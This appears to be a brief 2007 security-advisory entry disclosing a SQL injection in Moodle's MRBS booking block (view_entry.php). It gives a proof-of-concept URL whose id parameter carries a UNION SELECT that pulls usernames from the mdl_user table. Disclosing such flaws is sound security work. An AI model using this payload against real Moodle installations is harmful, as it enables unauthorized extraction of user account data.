Lucene search
SecurityvulnsSECURITYVULNS:DOC:18711HistoryDec 21, 2007 - 12:00 a.m.
Moodle SQL Injection
2007-12-2100:00:00
vulners.com
23
PATH/moodle/ing/blocks/mrbs/code/web/view_entry.php?id=[SQL]&day=27&month=10&year=2007
And a POC:
PATH/moodle/ing/blocks/mrbs/code/web/view_entry.php?id=2000%20UNION%20SELECT%20username,id,id,id,id,id,id,id,id,id,id,id%20FROM%20mdl_user%20WHERE%20id=[ID]&day=27&month=10&year=2007